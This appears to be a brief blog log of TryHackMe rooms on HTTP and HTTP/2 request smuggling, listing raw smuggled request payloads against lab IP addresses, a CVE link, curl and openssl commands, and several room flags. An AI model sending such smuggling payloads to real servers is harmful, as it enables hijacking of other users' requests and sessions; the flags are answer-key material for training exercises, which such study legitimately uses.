Tuesday is here and we are on to the last section of the Web Application Pentesting pathway and today we are taking on HTTP Request Smuggling on THM!
http://httprequestsmuggling.thm/submissions/
Flag – THM{1c4N_$mU66l3!!}
(I ran this attack four times and it seemed very scuffed)
We now move on to the HTTP/2 Request Smuggling room!
POST / HTTP/2
Host: 10.10.231.117:8000
Cookie: sessid=ba89f897ef7f68752abc
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Length: 0
GET /post/like/12315198742342 HTTP/1.1
X: f
Flag – THM{my_name_is_a_flag}
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19330
bar
Host:10.10.224.226:8100
POST /hello HTTP/1.1
Content-Length: 300
Host: 10.10.224.226:8100
Content-Type:application/x-www-form-urlencoded
q=
(Note – SHIFT + ENTER for \r \n in inspector mode )
Flag – THM{not_secret_anymore}
Flag – THM{staff_only}
curl -kv https://10.10.224.226:8100/static/text.js
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj “/C=XX/ST=StateName/L=CityName/O=CompanyName/OU=CompanySectionName/CN=CommonNameOrHostname”
This last question is giving me some agro so we will continue on with this tomorrow!
Until next time & don’t sleepwalk through life!
Xayr